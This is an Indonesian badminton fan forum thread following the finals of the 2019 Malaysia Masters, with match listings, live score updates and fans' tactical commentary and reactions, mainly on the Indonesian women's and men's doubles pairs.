Forum > Kejuaraan Internasional

FINAL - PERODUA Malaysia Masters 2019

Sabtu, 19 Januari 2019 20:07:12
8728 klik -- 118 respon
Oleh : iyap
Versi cetak

Categori
Level : HSBC BWF World Tour Super 500
Date : 20 January 2019
Prize Money : $350.000
Venue : Axiata Arena, Kuala Lumpur

Starting pukul 11.00 WIB

Respon

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : iyap
    Sabtu, 19 Januari 2019 20:08:38

    WD

    Apriyani Rahayu / Greysia Polii [4]
    vs
    Sayaka Hirota / Yuki Fukushima [1/JAP]

    Rank 4 || 1
    H2H 2 // 5

    ***************************

    XD
    Arisha Higashino / Yuta Watanabe [1/JAP]
    vs
    Sapsiree Taerattanachai / Dechapol Puavaranukroh [2/THA]

    Rank 3 ||. 5
    H2H Pertemuan Perdana😊

    ***************************

    WS
    Ratchanok Intanon [6/THA] vs Carolina Marin [4/ESP]

    Rank 8 || 6
    H2H 5 // 3

    ***************************

    MS
    Chen Long [3/CHI] vs Son Wan Ho [4/KOR]

    Rank 4 || 5
    H2H 11 // 4

    ***************************

    MD
    Kevin Sanjaya Sukamuljo / Marcus Fernaldi Gideon [1]
    vs
    Teo We Yi / Ong Yew Sin [MAL]

    Rank 1 || 27
    H2H 3 // 0

    ***************************

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : iyap
    Sabtu, 19 Januari 2019 20:12:15

    @mimin, tolong judulnya dirubah kena typo otomatis dari Handphone😂😂 maksudnya Masters dispace jadi masteran
    Maaf ya lama tidak aktif buat thread jadi gini😉

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : IKRA4433
    Sabtu, 19 Januari 2019 20:42:09

    Kenapa ada Ariska Puteri Pertiwi??

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Johantjun
    Sabtu, 19 Januari 2019 22:45:08

    Inget masteran cucak rowo kali yap 😆

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Johantjun
    Sabtu, 19 Januari 2019 22:48:59

    Kegid lawan satu-satunya wakil tuan rumah tersisa..
    Smoga gak ada kejutan ong/teo saja, bisa jadi gelar pertama kegid di tour 2019

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Johantjun
    Sabtu, 19 Januari 2019 22:52:32

    Greysap kembali dihadang batu terjal Wd jepang..
    Tapi dengan sudah bisa mengalahkan Ayamisa, harusnya lebih pede menghadapi Yukisay. Asal mau maen lebih bervariasi kayak tadi lawan Ayamisa, gelar bisa diraih..

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : uda_7070
    Minggu, 20 Januari 2019 00:07:48

    gresyap harus kuat dan tahan banting,.,..bersedia,.berdarah darah dilapangan jgn mau kalah begitu saja spt yg sudah2 ,....
    ingat Korea bisa mengalahkan mereka dan mereka bukan monster spt zamannya WangYu,......mereka bisa di kalahkan dengan smesh mematikan dan tekanan dari awal,..jgn diumbul,...2,..
    mereka di smesh dan di placing yang lebih variasi,.....
    jangan mau jadi runner up, jadilah nomor 1 kapan saja dimana saja

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : dohere
    Minggu, 20 Januari 2019 05:50:13

    Semoga 2 gelar, amiiinn

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : WaHyOe
    Minggu, 20 Januari 2019 08:49:27

    WangYu pas masih monster juga bisa dikasih satu digit sama Polli/Nitya hehehehe

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : rudal
    Minggu, 20 Januari 2019 09:50:24

    2015 mah wang yu udah ga monster

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : netlurus
    Minggu, 20 Januari 2019 09:53:57

    Greyap bisa ngalahin misaya, ketemu yukisay wkwk, jejepangan berjamur di tiap turnamen. Tp seenggaknya kali ini ga liga jepang di final. Semoga menang dan jadi gelar pertama 2019! Mainnya harus lebih solid lagi dari kemarin, secara defends yukisay ini tameng betool. Ga sekali dua kali nyemes langsung poin, harus bener2 sabar,pintar2 nyari celah, baru nyerang

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Minggu, 20 Januari 2019 10:01:13

    Kayaknya bak bik buk nda bakal efektif, wong WD bak bik buk (baca:Matsunaga) aja kmrn dihajar Fukurota. Lagian Greyap nda bs main bak bik buk banget, smesnya msh ngambang. Ehehe

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : iyap
    Minggu, 20 Januari 2019 10:48:36

    Kalau mau menang Greyap harus efektif bola˛ depannya, maen datar bola˛ setengah aja dan please Apri sebisa mungkin hindari Netting/dropshot dulu lah lebih enak ajak Japan Drive (Japan suka miringkan badan jadi posisi pengembalian bola bakalan sering nyangkut/tanggung).

    WangYu monster itu 2010-2012 setelah ada skandal OG semangat mereka meredup😂

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : mide
    Minggu, 20 Januari 2019 10:49:25

    Semoga Grey Apri bisa main maksimal hari ini. Jangan mau kalah mudah. KeGid semoga ndak terganjal dayangnya Goh Tan ya Allah, aamiiiiin

    @ikra mana Ariska Putri Pertiwi? Junjungan gue tuh wkwk

    @iyap lanjut lapak sebelah. Ooooh jadi persyaratan umur berubah itu hasil negonya CL?? Waaah hebat. Iya Jolene Noni Manado yg terlibat Asian Para Games tahun lalu. Mukanya campuran Kylie Mali Demi 💖

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : iyap
    Minggu, 20 Januari 2019 11:11:43

    @mide, iya kayanya CL bakalan Joint buat 2020 kalau syarat usia max PI 27 dirubah sedang MU kan max 28 (setelah angkatan Iris)

    @Uda Syafri iyap ngistora Selasa Rabu (harapannya untuk fobar Kantaphon, Juki, Sayaka, Aya Ohori, LYD, Yugo Kobayashi, Lee Soo Her, Puttita, Yaqiong, Siwei, lumayan lah buat dipajang di IG biar jualannya makin laku kalau ada yg cakep˛ tanpa endorse😂😂)

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Xman
    Minggu, 20 Januari 2019 11:16:43

    Parah grey apri mati ndiri terus ga di apa2in.. kayanya ga pede..

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : mide
    Minggu, 20 Januari 2019 11:21:37

    Fukurota unggul tipis 11-10

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : iyap
    Minggu, 20 Januari 2019 11:24:10

    Khabar gembira, ada celah buat menang Greyap dengan mengincar Yuki beberapa kali ga pede depan net selalu nyangkut dan out

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Mami
    Minggu, 20 Januari 2019 11:28:25

    Yuki/Sayaka [JPN] vs Greysia/Apri

    15-18

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : azerez
    Minggu, 20 Januari 2019 11:29:22

    wkwkwkkw Yuki banyak banget errornya diajak adu drive

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : mide
    Minggu, 20 Januari 2019 11:29:46

    Deg degan pantengin LS 😭😭😭😭
    Semoga Grey Apri ga kepleset ya Allah

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Mami
    Minggu, 20 Januari 2019 11:30:08

    Yuki/Sayaka [JPN] vs Greysia/Apri

    17-19

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : mide
    Minggu, 20 Januari 2019 11:30:58

    Masih tegang 20-18
    Jangan sampe ketikung pliiiiiis

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Mami
    Minggu, 20 Januari 2019 11:31:36

    Yuki/Sayaka [JPN] vs Greysia/Apri

    18-21

    Awal yang Baik

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : mide
    Minggu, 20 Januari 2019 11:32:25

    Alhamdulillah game pertama bungkus 21-18 😭😭😭
    Semoga set kedua lebih strong lagi mainnya Grey Ap
    Ketat banget sejak detik pertama 😥😥😥
    Sejauh ini Grey Ap berhasil menemukan formula meredam WD Jepang. Semoga konsisten aamiin

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Tuljaenak
    Minggu, 20 Januari 2019 11:32:30

    keren mainnya set 1 ..apriani progress bgt.. 2 set aja yuk bisa

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : iyap
    Minggu, 20 Januari 2019 11:33:30

    Alhamdulillah set 1 keambil, semoga cukup 2set
    Incer terus Yuki lagi underperform.
    Semangat Greyap

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : netlurus
    Minggu, 20 Januari 2019 11:34:04

    Yak greyap ambil game pembuka. Japan kesulitan nih main bola2 mid court, sering nyangkut

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : ringgo
    Minggu, 20 Januari 2019 11:34:31

    Hampir semua wd jepang keteteran kalau main drive

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Minggu, 20 Januari 2019 11:36:18

    Entah knp lbh impresif dgn mainnya Apri

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Mami
    Minggu, 20 Januari 2019 11:39:06

    Yuki/Sayaka [JPN] vs Greysia/Apri

    18-21 / 5-5

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Mami
    Minggu, 20 Januari 2019 11:40:47

    Yuki/Sayaka [JPN] vs Greysia/Apri

    18-21 / 8-5

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Minggu, 20 Januari 2019 11:42:35

    Jepang mainnya hd cepetttt

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Mami
    Minggu, 20 Januari 2019 11:42:59

    Yuki/Sayaka [JPN] vs Greysia/Apri

    18-21 / 11-5

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Minggu, 20 Januari 2019 11:45:15

    Di antara Fukurota emang Fukushima selalu jd biang error. Yok lanjutkan! 🤣

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Mami
    Minggu, 20 Januari 2019 11:45:51

    Yuki/Sayaka [JPN] vs Greysia/Apri

    18-21 / 13-9

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Mami
    Minggu, 20 Januari 2019 11:50:56

    Yuki/Sayaka [JPN] vs Greysia/Apri

    18-21 / 16-13

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : mide
    Minggu, 20 Januari 2019 11:53:02

    Set kedua masih ketinggalan 14-18
    Yok masih bisa nikung

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : netlurus
    Minggu, 20 Januari 2019 11:58:16

    Rubber! Seru nih matchnya wkwk. Tadi kedudukan 14-16 polanya udah dapet kayak game 1 tadi, tp ga bisa tahan smpe selese😭. Apri hari ini mainnya jempol banget deh, depan net megang banget bola2nya

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : mide
    Minggu, 20 Januari 2019 12:03:09

    Rubber 😭😭😭😭
    Semoga set ketiga bisa menang ya Allah aamiiiiin
    Mangats Grey Apri !!!!!

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Minggu, 20 Januari 2019 12:10:39

    Apri mulai error gim ketiga. Huhu

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : mide
    Minggu, 20 Januari 2019 12:11:46

    Masih ketat 8-8

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Minggu, 20 Januari 2019 12:14:20

    11-9. Bismillah!

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : netlurus
    Minggu, 20 Januari 2019 12:15:14

    Unggul 11-9 di game akhir. Ke empat pemain gada yg mau kalah depan net wkwk

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : iyap
    Minggu, 20 Januari 2019 12:20:27

    Yaaah stamina Greyap ngendor😂😂

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : mide
    Minggu, 20 Januari 2019 12:21:27

    14-17 😭😭😭

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : mide
    Minggu, 20 Januari 2019 12:22:09

    14-18 😭😭😭
    Butuh stamina ekstra utk membasmi WD Jepang dalam 2 hari berturut turut

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : mide
    Minggu, 20 Januari 2019 12:23:10

    15-18 masih ada harapan

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : mide
    Minggu, 20 Januari 2019 12:23:49

    15-19
    Masih bisa nikung

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : netlurus
    Minggu, 20 Januari 2019 12:27:10

    Kalahhh😭

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : irwanmul
    Minggu, 20 Januari 2019 12:28:06

    Permainan udah oke hari ini
    Cuma stamina ngga bisa bohong, Jepang masih stabil sampai akhir game ketiga

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Tuljaenak
    Minggu, 20 Januari 2019 12:28:50

    Sayang bgt apri banyak error set 3..Yasudahlah semoga minions menang

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Minggu, 20 Januari 2019 12:29:10

    Coba lagi!

    Apri semoga makin bagus dan net nya. Sudah lbh baik dibanding 2018 mainnya

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : iyap
    Minggu, 20 Januari 2019 12:29:16

    Memang saat ini hanya ChenJia dan LeeShin yang memiliki Stamina mumpuni jika ketemu Japan berturut-turut QF-SF-F (padahal Greyap dari SF)

    Terima Kasih Greyap kalahpun terhormat melewati perjuangan extra. Semoga masuk Final lagi di Indo masteran
    Della/Rizky sebenernya punya modal dan peluang gede buat Membabat WD Japan andai Staminanya........ Ya udahlah

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : mide
    Minggu, 20 Januari 2019 12:29:22

    Yaaaah kandas 😭😭😭😭
    Greysia Apri 21-18 16-21 16-21 dalam 75 menit

    Meskipun kalah tapi tetap disyukuri sih. Setidaknya di awal tahun udah bisa menapak final, gak gugur di SF lagi seperti yg sudah sudah. Kali ini Apri mainnya udah lebih bagus, tapi sayang fisik kalah badak kali ini. Ya gitu deh kalo tiap turnamen dikepung WD Jepang. Kebayang ngelawan WD yg grade nya sama dua hari beruntun dengan tensi pertandingan yang tinggi. Capek sih pastinya. Yaaaah come back stronger buat Grey Apri. Masih ada Indonesia Masters minggu depan wkwk. Selamat selamat. Coba lagi di turnamen berikutnya 👏👏👏

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : aa_piet
    Minggu, 20 Januari 2019 12:29:50

    Gakpapa GreysAp... kalian udah beri yg trbaik. Balas mnggu dpan di Jakarta... sec permainan udah apik banget. Kalah stamina aja.

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Ozil
    Minggu, 20 Januari 2019 12:32:04

    Walaupun kalah, apresiasi untuk Greysia Poli dan Apri. Cara main mereka udah berubah. Hanya mereka, terutama Greys yang keliatan udah kecapean di akhir set ketiga. Namun permainan yang ditunjukkan tidak membosankan. Selamat GreysApri,, to be the second best.

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : azerez
    Minggu, 20 Januari 2019 12:32:43

    set 3 kendor bgt mainnya, setidaknya sudah merubah cara main, lumayan gak mentok di semi lagi

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Minggu, 20 Januari 2019 12:33:54

    Kalah lgiiiii
    Bola apri parah
    Smas nanggung2 enak buat di banting jpg
    Tp untung defens cepet gres ini bgus
    Tp ttp aja tertekan
    Setiap apri smes klo gak bener2 bola itu tanngung bkal jdi titik balik jpg utuk menyerang,tggal banting lalu balik nekan

    Set 3 ada 18 kesalahan dri indonesia...15 diantaranya dri apri entah itu out,nyangkut atau ngasih umpan lawan
    3 dri gres itu pun salah satunya bola apri lpas trs gres gak siap nylametin

    Nasibmu gres jd atlet indonesia...krna tdak 1 pun pemain indo yg selevel dgn mu di era km
    Dri dlu hrus gendong
    Ttp ttp apresiasi bisa brsaing di dunia
    Andaikan saja ada 1 aja yg selevel dgn km mcam yunlei,tian qing,yu yang,lee kyung won dll pasti prestasimu bisa lbh dri ini...

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : senaraket
    Minggu, 20 Januari 2019 12:35:31

    Bisa ke final udah perbaikan bgt dibanding guangzhou yg kalah mudah. Semoga makin pd, yg dirasa masih kurang bisa dibenahi. WD yg lain jg harus ditingkatkan.

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : irwanmul
    Minggu, 20 Januari 2019 12:39:43

    Liat set 1 set 2 juga dong
    Banyak serobotan sama placing Apri yang hasilin poin, gres juga ga bagus2 banget, banyak servis bola tanggung atau ga sampai

    Udah ada improve dari mereka di 2019 ini, kita lihat aja buat turnamen selanjutnya

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Minggu, 20 Januari 2019 12:40:31

    Lebih suka formasi Apri di depan. Hehe.

    Ternyata dg pola baru lebih menguras stamina ya. Gila aja sih, dg main defensif aja mereka udh nguras tenaga banget. Gambaran solidnya kekuatan Jepang. Ckckck


    Tapi setidaknya ku puas ada usaha untuk lbh baik. Timingnya juga pas, sblm perhitungan olimpiade. Meski sbnrnya agak kesal mrk awal mencoba di WT Finalis. Huhu

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Minggu, 20 Januari 2019 12:44:21

    Btw nda salah kan dulu bilang coba Greyap mainnya nda umbul melulu. Tuh bisa. 🤣

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : katri-2011
    Minggu, 20 Januari 2019 12:44:32

    Sekarang Runner-Up dulu besok di Indonesia Open jangan sampai ndak juara malu... kalo kalah melulu....

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : WaHyOe
    Minggu, 20 Januari 2019 12:48:44

    Emg pernah ChenJia maupun LeeShin mengalahkan WD Jepang 3 pasangan sekaligus dari babak QF-SF-F?setauku sih belom pernah utk stamina menurutku Polii/Apri lebih baik ketimbang ChenJia maupun LeeShin. Della, Rizky, dan Ketut jika stamina ga mendukung susah utk bersaing karena modal utama main sistem rally poin yaa stamina.

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : dohere
    Minggu, 20 Januari 2019 13:26:51

    Jepang menyalip posisi Malaysia perolehan gelar BWF Tour sementara, kalau Minions bisa juara brarti posisinya sama dengan Jepang, betul gak?

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : dohere
    Minggu, 20 Januari 2019 13:29:12

    Sepertinya Greysia harus latihan service dulu secara intensive selama 1 bulan hahaha

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Minggu, 20 Januari 2019 13:51:15

    Indonesia di bawah Jepang dong. Kan Thailand & Malaysia beda level.

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Tuljaenak
    Minggu, 20 Januari 2019 13:54:25

    Astaga marin set 1 dikasih skor wakanda.. May lg on fire bgt

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : uda_7070
    Minggu, 20 Januari 2019 13:58:42

    satu2 cara agar greysap bisa menang lawan WD jepang adalah latihan dengan kegid,.....smesh terus,......biar tahan banting kayak MD,...
    klu gak bakalan kalah terus neh, krn dr serve sdh kebaca, main juga sdh dibaca lawan,....semua bisa dibaca,...harus ada pola baru,..dgn gaya baru,..yg lebih,.............full attach dan full stamina

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Tuljaenak
    Minggu, 20 Januari 2019 14:09:59

    Wkwkw kegid jg sibuk latihan kali ga ada waktu buat nglatih greysap.. Yg ada malah kegid kebalap sama rival2nya di luar sono

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Tuljaenak
    Minggu, 20 Januari 2019 14:28:41

    Kasian marin udah nikung jauh set 2 kalah nyesek.. Selamat May kalo main nya gini terus semua gelar bisa diborong May.. Asal ga cidera

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : senaraket
    Minggu, 20 Januari 2019 14:34:38

    Musuh utama may cedera (fisik stamina).

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : uda_7070
    Minggu, 20 Januari 2019 14:38:02

    maksudnya sparring partner,....@tuljaenak,...
    bukan kegid jadi pelatih,....
    sering2,...adu kecepatan dengan kegid biar ada pola baru di WD,...cari stamina terbaik yg bisa utk itu selain gresyap, agar WD INA perkasa dimana mana

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : iyap
    Minggu, 20 Januari 2019 14:54:07

    Cari aja pemain dari Indonesia Timur (bukan SARA ya)
    Stamina oke˛ disana karena dari kecil mereka sudah terbiasa dengan menempuh jalan kaki/lari berkilo-kilo meter untuk bersekolah naik turun bukit, nyebrang sungai, Medan jalanan ga mulus penuh dengan bebatuan gede˛semangat 45 pantang nyerang.
    Makanan dari alam langsung (sayur˛, ikan dari laut)
    Masuk Club'/Pelatnas sudah punya modal utama (Stamina, semangat) tinggal dipoles aja sama pelatih cara maen yg bener

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : uda_7070
    Minggu, 20 Januari 2019 15:24:10

    cerdasss,..iyap,......
    kan liliana natsiir dan apriani dr timur,...
    kayak atlit villy manganang cs,....cr yag tomboy dan kuat,....biar bisa main cepat

    Oleh : iyapMinggu, 20 Januari 2019 14:54:07
    Cari aja pemain dari Indonesia Timur (bukan SARA ya)
    Stamina oke˛ disana karena dari kecil mereka sudah terbiasa dengan menempuh jalan kaki/lari berkilo-kilo meter untuk bersekolah naik turun bukit, nyebrang sungai, Medan jalanan ga mulus penuh dengan bebatuan gede˛semangat 45 pantang nyerang.
    Makanan dari alam langsung (sayur˛, ikan dari laut)
    Masuk Club'/Pelatnas sudah punya modal utama (Stamina, semangat) tinggal dipoles aja sama pelatih cara maen yg bener

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : uda_7070
    Minggu, 20 Januari 2019 15:51:06

    menunggu kegid gue JUARA,...YANG SUDAH PASTI,..
    TINGGAL menunggu Skornya saja,.brp mau dikasih ongteo,.....malaysia,...
    kegid gue suka banget,......
    Pemain yg paling bergaransi,...yang sudah pasti dan tidak spt pemain lain,......

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Minggu, 20 Januari 2019 15:52:46

    Semoga melanjutkan tradisi MD Indonesia ngalahin tuan rumah di final. bento - fajri - semoga minions~

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : uda_7070
    Minggu, 20 Januari 2019 15:54:38

    tidak spt Final,...
    kegid spt menghadapi pemain babak (R1)
    yang paling kuatnya gohtan sdh ditaklukan,.......
    jadi akan semakin mudah ,..kegid JUARA PERDANA 2019

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : dohere
    Minggu, 20 Januari 2019 16:03:43

    Sulawesi bukan Indonesia Timur cuy... Tapi indonesia Tengah... Indonesia Timur itu Papua, Timor Leste...

    Klasemen sementara
    1. Jepang
    2. Thailand
    3. Malaysia (bisa naik posisi satu kl MD mrk ngalahin minion.. Amit2)
    4. Indonesia (bisa naik posisi 2 kalo minion bisa menang)

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Minggu, 20 Januari 2019 16:04:58

    Ong Yewsin titik lemah~

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : IKRA4433
    Minggu, 20 Januari 2019 16:12:43

    Ihhh...ihh...KEZEEEELLLLzzzz
    Gideon mainnya gitu...errrorrrran

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : IKRA4433
    Minggu, 20 Januari 2019 16:18:36

    Justru smash Kevin dr belakang lebih efektif.,karena secara arah dan sudut lebih menekan dibanding Gideon.,kurang nancap yaa Gideon smashnya..

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : uda_7070
    Minggu, 20 Januari 2019 16:20:40

    kevin juga dari Timur,....kok marah seh hahahahha
    kevin kan Jawa Timur..........

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : iyap
    Minggu, 20 Januari 2019 16:21:01

    Menghibur match nya
    Kirain Teo/Ong bakalan kalah mudah taunya setiap point' harus extra sampai˛ koh Kevin muter˛ balerina😂

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : senaraket
    Minggu, 20 Januari 2019 16:22:42

    Gak ada target khusus bisa juara. Smg md lain lebih berbenah. Minions yg paling penting nggak cedera aja, WBC yg blm dapat medali.

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : the_zedo
    Minggu, 20 Januari 2019 16:23:28

    akhirnya dia lg yang menyelamatkan wajah indonesia.. padahal thun kemaren udh ada perkembangan thai open yg juara tomy, n malay open fajri..lah skrg mundur lgi..

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Minggu, 20 Januari 2019 16:28:18

    Mainnya OngTeo bagus sih, ada bbrp reli menarik. Defense Kevin ampun deh.

    India Open Kevin/Gideon nda usah ikut lah, udh hattrick dan biasanya sepi, sekalian jaga kondisi. Fajar/Rian coba yg diandalkan jd juara.

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : uda_7070
    Minggu, 20 Januari 2019 16:30:08

    seru ya kak iyap,.....cerdass bangets kevin , bisa memutar balik fakta,.....alias memutar mutar di lapangan,......dengan skill yang FENOMENAL LUAR BIASA DIMANA MANA KAPAN SAJA dan selalu menjadi JUARA SEPANJANG MASA,..... hiks
    SELAMAT KEGID KALIAN LAYAK JUARA SEJATI SELALU DIHATI..
    Sampai jumpa ya kegid di ISTORA,....
    dan juga sampai jumpa kak iyap di Istora ya,..

    Oleh : iyapMinggu, 20 Januari 2019 16:21:01
    Menghibur match nya
    Kirain Teo/Ong bakalan kalah mudah taunya setiap point' harus extra sampai˛ koh Kevin muter˛ balerina😂

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : aa_piet
    Minggu, 20 Januari 2019 16:34:42

    Sulawesi, kalimantan, bali, NTB dan NTT kalo dr zona waktu msuk Indonesia Tengah. Yg indonesia Timur hanya maluku, maluku utara dan papua.

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : WaHyOe
    Minggu, 20 Januari 2019 16:41:48

    Semoga di Indonesia Masters bisa semua court lapangan ada livestreamingnya ayo jangan mau kalah sama Malaysia yg bisa menayangkan semua court lapangan.

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Johantjun
    Minggu, 20 Januari 2019 16:42:10

    Habis plesiran baru sempat nengok pas Kegid maen..
    Lumayan seru game kedua tapi Kegid lebih solid

    Gelar pertama Kegid tour 2019 di malaysia master
    Moga tahun 2019 Kegid tetap mendominasi!

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : han1
    Minggu, 20 Januari 2019 17:15:03

    chico dari papua ?

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : han1
    Minggu, 20 Januari 2019 17:18:39

    dl ada cynthia tuanakota perunggu kejuaran asia sama etty tantry..highest rank 6 ...stamina ok...jumpingsmash sering,,cuman kurang variatif...juara sea games 1998 ngalahin vita/emma ermawati klo ga salah..

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : han1
    Minggu, 20 Januari 2019 17:18:56

    cyntia tuaanokota dari maluku

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : rudal
    Minggu, 20 Januari 2019 17:24:39

    kevin defensenya makin caem aja ya, ga tembus2 diserang lawan. gideon nih yg mesti berbenah lg defensenya, msh sering tembus di dia. tadi mainnya si teo bagus sih tuh, hebat jg bs ngeladeni kevin depan net...tapi si ong biang keroknya, sering buat error2 ga penting wkwkwkk.

    gideon apa msh efek cedera ya ? errornya lumayan jg di turnament ini, dan kebanyakan dari bola2 nyerang atau bola2 simple, beda sama kevin kl error kan karena emg biasanya sering spekulasi.

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Johantjun
    Minggu, 20 Januari 2019 18:38:14

    Lihat rekaman match sih Greysap sudah maksimal permainanya, kurang tahan saja di set 3 tampil kurang menekan mungkin habis tenaga..

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Johantjun
    Minggu, 20 Januari 2019 18:43:10

    Son wan ho diluar dugaan bisa juara menaklukan Chen Long yg sedang on fire.. membuka gelar tour S-500 up buat korsel tahun ini. Son bisa jadi kuda hitam MS nih

    Intanon kalo sedang fit sangat mematikan.. Tai tzu ying dan Marin saja dilibas.. tapi herannya sering kesulitan kalo lawan WS china 😏

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : qlal
    Minggu, 20 Januari 2019 19:07:23

    Berharap Jauza dicoba juga dgn Della... utk masuk top ten dlm jangka 1 tahun Ini... Della butuh penggebuk yg bukan sekedar bisa gebuk, tp juga harus punya defends yg paling tahan... Dari keempat penggebuk muda Virni, Tania, Jauza dan Yulfira... Menurut saiya klo diberi urutan dgn dgn Kriteria smess dan defends adalah :
    1. Jauza
    2. Yulfira
    3. Virni
    4. Tania

    Utk Febriana biar saja dulu dgn Ribka dan dgn PM junior Lain sprt Lisa atau Indah krn masih bisa ikut AJC WJC

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Ginkev
    Minggu, 20 Januari 2019 19:21:35

    Apaan sih, mengharapkan della lg della lg..
    Mna gaungny udh umur uzur blm ada sm sx.

    Klo dia loya pemain elite mau di pasangkan sm spa aja psti bagus, contohnya liliyana, vita n greysia..
    Ini si della, perasaan mulai zaman batu udh diotak atik tuh org dr penjuru org pasangannya, tetap aja dia TIDAK pernah pemain WD 1 Indonesia, hy bs penggembira aja.
    CAPEK DEH!!

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Ginkev
    Minggu, 20 Januari 2019 19:29:33

    Della itu pemain butiran debu..
    Bukan pasangannya yg ga cocok, yg ada dia emg pemain standart aja alias pemain menengah ke bawah.

    Della itu tdk lain sm dgn pasangan klo di MD ini berry, hardi, ade, wahyu..pemain yg ga prnh jd pemain elite. Titik!

    Sejelek2nya pemain kyk Angga,ricky, rian, bona, praven yg ada lbh jelek si Della ini.

